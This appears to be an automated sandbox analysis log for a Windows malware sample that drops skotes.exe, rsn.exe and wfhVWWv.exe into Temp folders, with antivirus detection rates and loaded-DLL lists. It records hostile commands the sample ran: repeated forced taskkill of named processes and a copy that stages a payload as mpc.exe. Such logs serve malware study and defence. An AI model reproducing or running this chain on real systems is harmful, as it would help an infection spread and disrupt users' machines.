Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Fi3ptS6O8D.exe	ReversingLabs: Detection: 65%
Source: Fi3ptS6O8D.exe	Virustotal: Detection: 61%

Source: Fi3ptS6O8D.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File read: C:\Users\user\Desktop\Fi3ptS6O8D.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Fi3ptS6O8D.exe "C:\Users\user\Desktop\Fi3ptS6O8D.exe"
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "nvidia.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "svdhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "csrr.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "mnn.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "mme.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "nnu.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "lss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "onn.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "u-eng.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "svdhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mnn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "onn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "u-eng.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nnu.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nvidia.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "csrr.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "lss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mme.exe"
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe "C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe"
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe "C:\Users\user\AppData\Local\Temp\1029428001\wfhVWWv.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe "C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "nvidia.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "svdhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "csrr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "mnn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "mme.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "nnu.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "lss.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "onn.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill.exe /F /IM "u-eng.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c copy /y "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\41678903251236549780" "C:\Users\user\AppData\Local\Temp\_MEI51~1\mpc\mpc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nvidia.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "svdhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "csrr.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mnn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "mme.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "nnu.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "lss.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "onn.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM "u-eng.exe"

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: pywintypes27.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: tcl85.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Section loaded: tk85.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
